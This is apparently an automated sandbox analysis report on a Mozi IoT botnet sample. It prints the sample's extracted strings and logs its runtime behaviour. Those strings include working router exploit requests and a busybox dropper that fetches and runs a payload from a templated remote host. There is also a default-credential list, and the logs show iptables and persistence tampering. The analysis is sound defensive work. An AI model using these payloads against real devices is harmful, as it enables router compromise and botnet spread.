                Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                Source: Initial sampleString containing potential weak password found: admin
                Source: Initial sampleString containing potential weak password found: default
                Source: Initial sampleString containing potential weak password found: support
                Source: Initial sampleString containing potential weak password found: service
                Source: Initial sampleString containing potential weak password found: supervisor
                Source: Initial sampleString containing potential weak password found: guest
                Source: Initial sampleString containing potential weak password found: administrator
                Source: Initial sampleString containing potential weak password found: 123456
                Source: Initial sampleString containing potential weak password found: 54321
                Source: Initial sampleString containing potential weak password found: password
                Source: Initial sampleString containing potential weak password found: 12345
                Source: Initial sampleString containing potential weak password found: admin1234
                Source: Initial samplePotential command found: POST /cdn-cgi/
                Source: Initial samplePotential command found: GET /c HTTP/1.0
                Source: Initial samplePotential command found: POST /cdn-cgi/ HTTP/1.1
                Source: Initial samplePotential command found: GET %s HTTP/1.1
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: Initial samplePotential command found: rm /home/httpd/web_shell_cmd.gch
                Source: Initial samplePotential command found: echo 3 > /usr/local/ct/ctadmincfg
                Source: Initial samplePotential command found: mount -o remount,rw /overlay /
                Source: Initial samplePotential command found: mv -f %s %s
                Source: Initial samplePotential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: GET /c
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: killall -9 %s
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
                Source: Initial samplePotential command found: killall -9 telnetd utelnetd scfgmgr
                Source: Initial samplePotential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
                Source: Initial samplePotential command found: GET /%s HTTP/1.1
                Source: Initial samplePotential command found: POST /%s HTTP/1.1
                Source: Initial samplePotential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
                Source: Initial samplePotential command found: POST /picsdesc.xml HTTP/1.1
                Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: Initial samplePotential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                Source: Initial samplePotential command found: POST /UD/act?1 HTTP/1.1
                Source: Initial samplePotential command found: POST /HNAP1/ HTTP/1.0
                Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                Source: Initial samplePotential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
                Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
                Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: nT7K5GG5km, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                Source: /usr/networks, type: DROPPEDMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                Source: classification engineClassification label: mal100.spre.troj.evad.lin@0/221@4/0

                Persistence and Installation Behavior:

                barindex
                Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
                Source: /bin/sh (PID: 4638)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4672)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4679)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4720)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4732)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT
                Source: /bin/sh (PID: 4755)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT
                Source: /bin/sh (PID: 4763)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT
                Source: /bin/sh (PID: 4785)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT
                Source: /bin/sh (PID: 4815)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4819)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4838)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4866)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4896)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4915)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4939)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 4966)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 4986)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 4992)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5015)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5042)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5063)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5071)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5095)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5119)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5139)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5158)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5167)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5194)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5215)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT
                Source: /bin/sh (PID: 5229)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT
                Source: /bin/sh (PID: 5253)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT
                Source: /bin/sh (PID: 5265)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT
                Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /proc/4600/mountsJump to behavior
                Sample tries to persist itself using /etc/profileShow sources
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/profile.d/cedilla-portuguese.shJump to behavior
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/profile.d/apps-bin-path.shJump to behavior
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/profile.d/Z97-byobu.shJump to behavior
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/profile.d/bash_completion.shJump to behavior
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/profile.d/vte-2.91.shJump to behavior
                Sample tries to persist itself using System V runlevelsShow sources
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/rcS.d/S95baby.shJump to behavior
                Source: /tmp/nT7K5GG5km (PID: 4600)File: /etc/rc.localJump to behavior
                Terminates several processes with shell command 'killall'Show sources
                Source: /bin/sh (PID: 4604)Killall command executed: killall -9 telnetd utelnetd scfgmgr
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/4294/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/230/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/231/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/232/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/233/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/234/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3512/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/359/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/1452/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3632/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/4600/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/4602/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3518/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/10/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/1339/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/4605/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/11/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/12/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/13/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/14/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/15/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/16/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/17/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/18/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/19/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/483/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3527/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3527/cmdline
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/1/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/2/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3525/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/1346/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3524/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3524/cmdline
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/4/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3523/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/5/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/7/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/8/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/9/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/20/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/21/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/22/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/23/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/24/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/25/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/28/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/29/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/1363/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3541/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3541/cmdline
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/1362/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/496/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/496/cmdline
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/30/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/31/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/31/cmdline
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/1119/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3790/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3791/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3310/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3431/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3431/cmdline
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3550/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/260/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/263/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/264/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/385/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/144/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/386/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/145/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/146/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3546/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3546/cmdline
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/147/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3303/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3545/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/148/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/149/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3543/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/822/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/822/cmdline
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3308/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3308/cmdline
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3429/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/3429/cmdline
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/47/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/48/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/48/cmdline
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/49/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/150/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/271/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/151/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/152/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/153/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/395/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/396/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/154/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/155/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/156/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/1017/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/157/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/158/stat
                Source: /usr/bin/killall (PID: 4604)File opened: /proc/159/stat
                Source: /tmp/nT7K5GG5km (PID: 4602)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                Source: /tmp/nT7K5GG5km (PID: 4636)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT"
                Source: /tmp/nT7K5GG5km (PID: 4670)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT"
                Source: /tmp/nT7K5GG5km (PID: 4674)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT"
                Source: /tmp/nT7K5GG5km (PID: 4715)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT"
                Source: /tmp/nT7K5GG5km (PID: 4724)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 44040 -j ACCEPT"
                Source: /tmp/nT7K5GG5km (PID: 4750)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT"
                Source: /tmp/nT7K5GG5km (PID: 4759)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT"
                Source: /tmp/nT7K5GG5km (PID: 4775)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT"
                Source: /tmp/nT7K5GG5km (PID: 4813)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 4816)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 4828)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 4855)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 4882)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                Source: /tmp/nT7K5GG5km (PID: 4891)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                Source: /tmp/nT7K5GG5km (PID: 4893)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 4904)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 4931)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 4955)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 4979)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 4988)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 5005)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 5031)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 5057)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 5065)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 5085)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 5111)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                Source: /tmp/nT7K5GG5km (PID: 5137)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT"
                Source: /tmp/nT7K5GG5km (PID: 5149)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT"
                Source: /tmp/nT7K5GG5km (PID: 5160)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT"
                Source: /tmp/nT7K5GG5km (PID: 5182)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT"
                Source: /tmp/nT7K5GG5km (PID: 5210)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 8080 -j ACCEPT"
                Source: /tmp/nT7K5GG5km (PID: 5219)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT"
                Source: /tmp/nT7K5GG5km (PID: 5248)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT"
                Source: /tmp/nT7K5GG5km (PID: 5257)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT"
                Source: /bin/sh (PID: 4638)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4672)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4679)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4720)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4732)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT
                Source: /bin/sh (PID: 4755)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT
